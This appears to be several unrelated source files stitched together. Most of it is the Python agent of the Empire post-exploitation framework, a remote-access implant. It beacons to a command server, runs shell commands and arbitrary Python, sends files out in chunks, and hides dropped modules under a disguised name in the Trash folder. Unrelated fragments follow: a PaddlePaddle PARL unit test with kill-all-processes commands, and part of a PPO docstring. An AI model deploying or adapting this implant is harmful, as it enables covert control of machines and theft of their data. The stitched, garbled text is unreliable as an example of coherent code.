profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
proxy_list = []
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
if packets is None:
return
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
    +------+--------------------+----------+---------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if (isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8', 'ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L', len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
def parse_task_packet(packet, offset=0):
"""
    Parse a result packet.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
    +------+--------------------+----------+---------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
    Returns a tuple with (packetType, totalPackets, packetNum, resultID, length, data, remainingData)
"""
try:
packetType = struct.unpack('=H', packet[0 + offset:2 + offset])[0]
totalPacket = struct.unpack('=H', packet[2 + offset:4 + offset])[0]
packetNum = struct.unpack('=H', packet[4 + offset:6 + offset])[0]
resultID = struct.unpack('=H', packet[6 + offset:8 + offset])[0]
length = struct.unpack('=L', packet[8 + offset:12 + offset])[0]
packetData = packet[12 + offset:12 + offset + length].decode('UTF-8')
remainingData = packet[12 + offset + length:].decode('UTF-8')
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:", e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
# processes an encrypted data packet
    # - decrypts/verifies the response to get the plaintext tasking packets
# -extracts the packets and processes each
try:
# aes_decrypt_and_verify is in stager.py
tasking = aes_decrypt_and_verify(key, data).encode('UTF-8')
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking,
offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = b""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:", e)
pass
def process_packet(packetType, data, resultID):
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 34:
proxy_list = json.loads(data)
update_proxychain(proxy_list)
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData, resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData, resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
            send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
            return
if not os.path.isdir(objPath):
fileList.append(objPath)
else:
# recursive dir listing
for folder, subs, files in os.walk(objPath):
for filename in files:
                    # skip broken symlinks
                    if os.path.exists(folder + "/" + filename):
                        fileList.append(folder + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" % (partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
with open(filePath, 'ab') as f:
f.write(raw)
send_message(build_response_packet(42, "[*] Upload of %s successful" % (filePath), resultID))
except Exception as e:
send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" % (filePath, str(e)), resultID))
elif packetType == 43:
# directory list
cmdargs = data
path = '/' # default to root
if cmdargs is not None and cmdargs != '' and cmdargs != '/': # strip trailing slash for uniformity
path = cmdargs.rstrip('/')
if path[0] != '/': # always scan relative to root for uniformity
path = '/{0}'.format(path)
if not os.path.isdir(path):
            send_message(build_response_packet(43, 'Directory {} not found.'.format(path), resultID))
            return
items = []
with os.scandir(path) as it:
for entry in it:
items.append({'path': entry.path, 'name': entry.name, 'is_file': entry.is_file()})
result_data = json.dumps({
'directory_name': path if len(path) == 1 else path.split('/')[-1],
'directory_path': path,
'items': items
})
send_message(build_response_packet(43, result_data, resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" % (x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
            send_message(build_response_packet(0, "[*] Job thread stopped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" % (data), resultID)
elif packetType == 100:
        # dynamic code execution, wait for output, don't save output
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue().encode('latin-1')
c = compress()
start_crc32 = c.crc32_data(results)
comp_data = c.comp_data(results)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
send_message(
build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart,
resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = buffer.getvalue()
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" % (implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" % (implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "[*] Module path was properly removed: %s" % (implantPath)
except Exception as e:
                print("error removing module file: %s" % (e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0,
"error executing specified Python data: %s \nError removing module file, please verify path: %s" % (
e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" % (e), resultID))
elif packetType == 110:
start_job(data, resultID)
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
# base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 122:
# base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
# view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----" + key + "----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----" + repoName + "----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
# remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
            send_message(build_response_packet(124, "Successfully removed repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
        send_message(build_response_packet(0, "invalid tasking ID: %s" % (packetType), resultID))
def old_div(a, b):
"""
Equivalent to ``a / b`` on Python 2 without ``from __future__ import
division``.
"""
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
# check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
        # Error out if we can't find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r' % (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
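# Minimal usage sketch for the import hook above (illustrative only; the repo
# and module names are made up, and it relies on the legacy find_module/
# load_module protocol, which CPython stopped falling back to in 3.12):
# build an in-memory zip containing a module, register it in moduleRepo,
# install the finder, then import the module by name.
def _import_hook_example():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("hello.py", "GREETING = 'hi from the zip'\n")
    moduleRepo["example_repo"] = zipfile.ZipFile(io.BytesIO(buf.getvalue()), "r")
    install_hook("example_repo")
    try:
        import hello
        return hello.GREETING
    finally:
        remove_hook("example_repo")
        del moduleRepo["example_repo"]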
################################################
#
# misc methods
#
################################################
class compress(object):
'''
Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
cvalue = 0-9 comp value (default 9)
'''
cdata = zlib.compress(data, cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I", crc)
built_data = header + data
return built_data
class decompress(object):
'''
Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
dict with crc32 check and decompressed data string
ex. {"crc32_check" : True, "data" : "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return {"header_crc32": comp_crc32, "dec_crc32": dec_crc32, "crc32_check": crc32, "data": dec_data}
else:
dec_data = zlib.decompress(data)
return dec_data
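# Round-trip sketch for the framing used by compress/decompress above
# (illustrative): the sender prepends a 4-byte big-endian CRC32 of the
# plaintext to the zlib-compressed payload, and the receiver re-checks it
# after decompression.
def _compression_roundtrip_example():
    c = compress()
    d = decompress()
    plaintext = b"tasking payload" * 10
    framed = c.build_header(c.comp_data(plaintext), c.crc32_data(plaintext))
    result = d.dec_data(framed, cheader=True)
    assert result["crc32_check"] is True
    assert result["data"] == plaintext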
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
for job in list(jobs):
job.kill()
del jobs[:]
except:
# die hard if thread kill fails
pass
sys.exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n' + padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs=None, daemon=None):
Thread.__init__(self, group, target, name, args, kwargs if kwargs else {}, daemon=daemon)
self._return = None
def run(self):
# Python 3 Thread keeps the target in self._target (the old
# self._Thread__target name mangling was Python 2 only)
if self._target is not None:
self._return = self._target(*self._args, **self._kwargs)
def join(self, timeout=None):
Thread.join(self, timeout)
return self._return
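# Usage sketch (illustrative, never called by the agent): join() hands back
# whatever the target returned.
def _thread_return_value_example():
    t = ThreadWithReturnValue(target=lambda x, y: x + y, args=(2, 3))
    t.start()
    return t.join()  # -> 5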
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
self.run = self.__run # Force the Thread to install our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
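# Sketch of the trace-based kill above (illustrative): once kill() sets
# self.killed, localtrace() raises SystemExit on the next executed line in
# the thread, so the loop below dies shortly after kill() is called.
def _kthread_example():
    def spin():
        while True:
            time.sleep(0.1)
    t = KThread(target=spin)
    t.start()
    t.kill()
    t.join(timeout=1)
    return not t.is_alive()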
def start_job(code, resultID):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code[1:])
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
# create/process Packet start/return the thread
# call the job_func so sys data can be captured
codeThread = KThread(target=job_func, args=(resultID,))
codeThread.start()
jobs.append(codeThread)
def job_func(resultID):
try:
buffer = StringIO()
sys.stdout = buffer
# now call the function required
# and capture the output via sys
method()
sys.stdout = sys.__stdout__
dataStats_2 = buffer.getvalue()
result = build_response_packet(110, str(dataStats_2), resultID)
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p, resultID)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" % (e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data.encode())
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(os.path.join(path, fn)):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = Environment.UserName
# Needed?
group = "Users"
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr, user, group, mtime, fsize, unit, fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return Environment.UserName
elif re.compile("hostname").match(command):
return str(socket.gethostname())
elif re.compile("ps").match(command):
myrunspace = Runspaces.RunspaceFactory.CreateRunspace()
myrunspace.Open()
pipeline = myrunspace.CreatePipeline()
pipeline.Commands.AddScript("""
$owners = @{}
Get-WmiObject win32_process | ForEach-Object {$o = $_.getowner(); if(-not $($o.User)) {$o='N/A'} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o}
$p = "*";
$output = Get-Process $p | ForEach-Object {
$arch = 'x64';
if ([System.IntPtr]::Size -eq 4) {
$arch = 'x86';
}
else{
foreach($module in $_.modules) {
if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") {
$arch = 'x86';
break;
}
}
}
$out = New-Object psobject
$out | Add-Member Noteproperty 'ProcessName' $_.ProcessName
$out | Add-Member Noteproperty 'PID' $_.ID
$out | Add-Member Noteproperty 'Arch' $arch
$out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()]
$mem = "{0:N2} MB" -f $($_.WS/1MB)
$out | Add-Member Noteproperty 'MemUsage' $mem
$out
} | Sort-Object -Property PID | ConvertTo-Json;
$output
""")
results = pipeline.Invoke()
buffer = StringIO()
sys.stdout = buffer
for result in results:
print(result)
sys.stdout = sys.__stdout__
return_data = buffer.getvalue()
return return_data
else:
if cmdargs is None:
cmdargs = ''
cmd = "{} {}".format(command, cmdargs)
return os.popen(cmd).read()
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
# the boolean "base64" argument shadows the base64 module, so bind the module under another name
import base64 as b64codec
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return b64codec.b64encode(data)
else:
return data
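# Sketch of chunked reads with get_file_part() (illustrative; the path is a
# stand-in): walk the file in chunkSize steps and reassemble the raw bytes.
def _chunked_read_example(path="/etc/hostname", chunk=1024):
    parts, offset = [], 0
    while True:
        piece = get_file_part(path, offset=offset, chunkSize=chunk, base64=False)
        if not piece:
            break
        parts.append(piece)
        offset += chunk
    return b"".join(parts)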
################################################
#
# main agent functionality
#
################################################
while (True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start, end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" % (sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
# exit if we miss communicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
|
reset_job_test_alone.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import parl
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.remote.client import disconnect
from parl.utils import logger, _IS_WINDOWS
import os
import threading
import time
import subprocess
@parl.remote_class
class Actor(object):
def __init__(self, arg1=None, arg2=None):
self.arg1 = arg1
self.arg2 = arg2
def get_arg1(self):
return self.arg1
def get_arg2(self):
return self.arg2
def set_arg1(self, value):
self.arg1 = value
def set_arg2(self, value):
self.arg2 = value
def add_one(self, value):
value += 1
return value
def add(self, x, y):
time.sleep(3)
return x + y
def will_raise_exception_func(self):
x = 1 / 0
class TestJobAlone(unittest.TestCase):
def tearDown(self):
disconnect()
def test_job_exit_exceptionally(self):
master = Master(port=1334)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
worker1 = Worker('localhost:1334', 4)
time.sleep(10)
self.assertEqual(worker1.job_buffer.full(), True)
time.sleep(1)
self.assertEqual(master.cpu_num, 4)
print("We are going to kill all the jobs.")
if _IS_WINDOWS:
command = r'''for /F "skip=2 tokens=2 delims=," %a in ('wmic process where "commandline like '%remote\\job.py%'" get processid^,status /format:csv') do taskkill /F /T /pid %a'''
print(os.popen(command).read())
else:
command = (
"ps aux | grep remote/job.py | awk '{print $2}' | xargs kill -9"
)
subprocess.call([command], shell=True)
parl.connect('localhost:1334')
actor = Actor()
self.assertEqual(actor.add_one(1), 2)
time.sleep(20)
master.exit()
worker1.exit()
if __name__ == '__main__':
unittest.main()
|
dppo.py
|
"""
A simple version of OpenAI's Proximal Policy Optimization (PPO). [https://arxiv.org/abs/1707.06347]
Distributing workers in parallel to collect data, then stop worker's roll-out and train PPO on collected data.
Restart workers once PPO is updated.
The global PPO updating rule is adopted from DeepMind's paper (DPPO):
Emergence of Locomotion Behaviours in Rich Environments (Google Deepmind): [https://arxiv.org/abs/1707.02286]
View more on my tutorial website: https://morvanzhou.github.io/tutorials
